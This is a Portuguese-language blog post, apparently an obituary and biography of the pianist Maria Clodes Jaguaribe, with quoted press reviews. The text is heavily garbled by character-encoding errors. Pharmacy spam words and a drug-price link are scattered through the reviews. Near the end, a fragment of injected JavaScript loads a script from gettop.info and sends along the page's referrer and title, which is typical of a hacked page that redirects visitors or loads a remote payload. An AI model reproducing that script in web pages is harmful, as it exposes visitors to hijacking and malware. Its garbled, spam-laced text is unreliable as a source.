Notícia

A pianista Maria Clodes Jaguaribe nos deixou…

A solista da noite Maria Clodes A� uma completa pianista de alta categoria Purchase .


Domingo passado, 22 de novembro, tive a forte intuiA�A?o de que deveria estar por um momento com a grande pianista Maria Clodes Jaguaribe, com quem tive a imensa satisfaA�A?o de trabalhar como empresA?rio porA�10 anos. Alguma coisa me dizia que ela nos deixaria para sempre no dia de seu aniversA?rio de 87 anos, dia de Santa CecA�lia, sua padroeira, dos mA?sicos e da mA?sica. Maria sofria de cA?ncer generalizado e estava internada havia 4 dias. Havia voltado para o Brasil no inA�cio de 2013 com a saA?de bastante debilitada. Aqui teve dois anos de alguma recuperaA�A?o e algum alA�vio. Um ciclo encerrado de muito amor e alegria. De arte e intelectualidade. De sensibilidade e fA� no ser humano. De doaA�A?o a seus alunos e ao seu maravilhoso piano, onde as notas de Bach, Schumann, Schubert, Beethoven e Villa-Lobos encontraram uma intA�rprete da mais alta categoria. Ela nos deixou com o seu rosto mais sereno e belo, de uma nobreza A?nica. A nobreza dos grandes seres humanos“.

AndrA� Oliveira

 

Maria Clodes Jaguaribe

Maria Clodes Jaguaribe
Maria Clodes Jaguaribe

A pianista nascida em Paris de pais brasileiros foi uma das glA?rias da cena clA?ssica brasileira. Com uma carreira praticamente toda feita fora do paA�s desde a adolescA?ncia, a artista tocou nos mais cA�lebres palcos do grande circuito musical na Europa e nos Estados Unidos, tendo suas apresentaA�A�es sempre festejadas pela crA�tica e pelo pA?blico como acontecimentos especiais.

Radicada em Boston por cerca de 40 anos, foi uma das mais conceituadas mestras e depois chairwoman do departamento de piano na Escola de MA?sica da Boston University. Foi, por 35 anos, diretora das classes de verA?o para jovens pianistas do famoso Festival de Tanglewood e, por isso, construiu um dos mais respeitados nomes entre os mestres de piano nos EUA.

Teve como seu projeto artA�stico mais importante, a gravaA�A?o integral da obra para piano de Schumann, cujo primeiro volume com 6 CDs e quase sete horas de mA?sica chegou ao mercado em dezembro de 2004 pelo selo carioca Delira MA?sica e que foiA�celebrado com um “Ciclo Schumann” de trA?s concertos de cA?mera na Sala CecA�lia Meireles, onde recebeu como colaboradores a violinista Ana de Oliveira, o violista Nayran Pessanha, o cellista David Chew e o tenor Ricardo Tuttman.

Ainda ao lado de Ana, Nayran e David, tocouA�SchumannA�durante o MIMO Festival em Olinda, mesma ocasiA?oA�em que foi solista da SinfA?nica do Recife numa memorA?vel noite onde interpretou o Concerto em LA? Maior K 488 de Mozart . Ao lado da Orquestra SinfA?nica Nacional da UFF havia feito tambA�m uma histA?rica apresentaA�A?o, sob regA?ncia de LA�gia Amadio, das VariaA�A�es SinfA?nicas de CA�sar Franck, tendo sido aplaudida e cumprimentada no palco por todos os membros da orquestra.

Sob direA�A?o do premiado cineasta alemA?o Sylvestre Campe, filmou um DVD/documentA?rio, ainda a ser finalizado, em que mesclou as obras de Bach, Schubert e Villa-Lobos, com entrevistas em que conta sua vida e suas peripA�cias pelo mundo, com imagens no Rio e em Boston.

Maria Clodes apresentou-se como solista de orquestras, como recitalista e como membro de ensembles de cA?mera extremamente refinados, em que se destacou seu duo ao lado do violinista russo Yuri Mazurkevich e membros principais da SinfA?nica de Boston, em sua maioria nos EUA.

Em 2006, dirigiu e estrelou no Tsai Performance Center de Boston um outro Ciclo Schumann – Crossing Paths, com oito concertos e recitais, em que mais uma vez apresentou as mais cA�lebres pA?ginas do gA?nio alemA?o, seu objeto de estudo.

Em 2008, celebrou no Brasil seus 80 anos de idade e 70 de carreira tocando os famosos Concertos de Bach (FA? menor) e de Rachmaninoff nA?2 em colaboraA�A?o com a SinfA?nica do Recife e a SinfA?nica de Barra Mansa, orquestra que a recebeu mais de uma vez com grande entusiasmo.

Tendo se iniciado muito cedo ao piano ainda no Rio de Janeiro, logo partiu para aperfeiA�oamentos no exterior, culminando com suas participaA�A�es na Academia de VerA?o em Salzburgo, no Concurso Internacional de Piano de Munique, onde obteve o segundo prA?mio, ainda nos anos 50, no aperfeiA�oamento com Leonie Gombrich, em Oxford, e na obtenA�A?o da medalha do Instituto Harriet Cohen em Londres, concedida ao “Melhor Pianista do Ano” na mesma A�poca.

Maria Clodes deixa um raro legado de artista que, vivendo sempre longe da pA?tria, se dedicou a levar a alma brasileira a tudo o que fez, tanto na interpretaA�A?o de repertA?rio brasileiro de Villa-Lobos e Santoro, quanto no intenso amor dedicado aos seus numerosos alunos de Tanglewood e da Boston University.

Seus filhos Katrina e Timothy permanecem nos EUA. Maria Clodes era irmA? do cientista polA�tico HA�lio Jaguaribe.

Algumas crA�ticas

a�?No Ciclo, dedicado ao compositor Schumann, realizado na Sala CecA�lia Meireles de 28 a 30/11/04, tivemos a apresentaA�A?o da pianista brasileira Maria Clodes Jaguaribe…. Lamentavelmente pouco se apresenta no Brasil… encantou-nos com a bela Fantasia Op. 17 e o famoso Arabesque. A escolha de Maria Clodes para representar a parte do piano neste ciclo, foi realmente acertada …. afinidade de alma fez de Maria Clodes a intA�rprete ideal do piano romA?ntico de Schumann….. toque perolado fez-nos lembrar a grande Guiomar Novaes. Apreciamos ainda a Sonata op. 22 em Sol menor, onde o estilo conciso, lA�mpido e poA�tico do compositor teve uma intA�rprete A� altura.a�? – SiteA�Movimento.comA�- Fernanda Maria F. Cruz a�� 2004 a�� Rio de Janeiro

a�?…transcendA?ncia e erudiA�A?o. A pianista se insere na linhagem de intA�rpretes que dominam plenamente seu objeto de estudo, e privilegia, desde sempre, o aspecto A�ntimo e sutil do compositor….. Maria faz um Schumann que se ouve como se fossem palavras sussurradas a meia voza�?. Order – Luiz Krausz a�� Revista Bravo, MarA�o 2005 a�� SA?o Paulo, sobre o lanA�amento da Caixa de 6 CDA?s.

…para essa bela mA?sica exige-se uma grande pianista. O domA�nio instrumental, perfeito e amplo, os conhecimentos mA?sico-instrumentais….. a tornam intA�rprete ideal de Schumann, cuja mA?sica recebe e transmite por verdadeira empatia.” – Eurico Nogueira FranA�a – Theatro Municipal do Rio de Janeiro

Maria Clodes fez ontem o que se poderia chamar de o mais excitante, intelectualmente provocador, maduro e belo dA�but da temporada” – Journal Tribune a�� New York – 1965

“....houve uma total identificaA�A?o com o carA?ter de Eusebius, o sonhador, mesmo quando os sonhos comeA�am a voar na nostalgia de um mundo desconhecido…. em todos aqueles momentos, e houve tantos, Maria Clodes estA? completamente unificada com Schumann, ela se torna a poeta do piano” – Algemeen Handelsblad – Amsterdam – 1956

online http://adie-cupu.mhs.narotama.ac.id/2018/02/02/augmentin-injection-price/ A solista da noite Maria Clodes A� uma completa pianista de alta categoria.” – Salzburger Volksblatt – A?ustria

Apesar de seu programa ser comum, todo o concerto foi eletrizante, da primeira A� A?ltima nota, graA�as a uma tA�cnica perfeita e A� alta concepA�A?o musical dessa talentosa e pouco comum artista” – Hessische Nachrichten Kassel – Alemanha

Uma solista de grande estilo A� Maria Clodes…. tocou com extraordinA?rio brilhantismo as VariaA�A�es SinfA?nicas de CA�sar Franck generics in canada ” – Salzburg Nachrichten – A?ustria

A pianista brasileira tem charme musical e qualidade tA�cnica… poA�tica A� a palavra que a descreve melhor… a sua Sonata de Schubert foi iluminada por dentro… nA?o foi o Schubert ensolarado que estamos acostumados a ouvir, mas sim o gracioso, com suas passagens violentas cheias de cor Order ” – New York Times – New York

 

Purchase Quarteto op. 25 em Sol menor, de Brahms
Purchase Pianista: Maria Clodes Jaguaribe

https://www.youtube.com/watch?v=D5U9WZlx1zw

 if (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.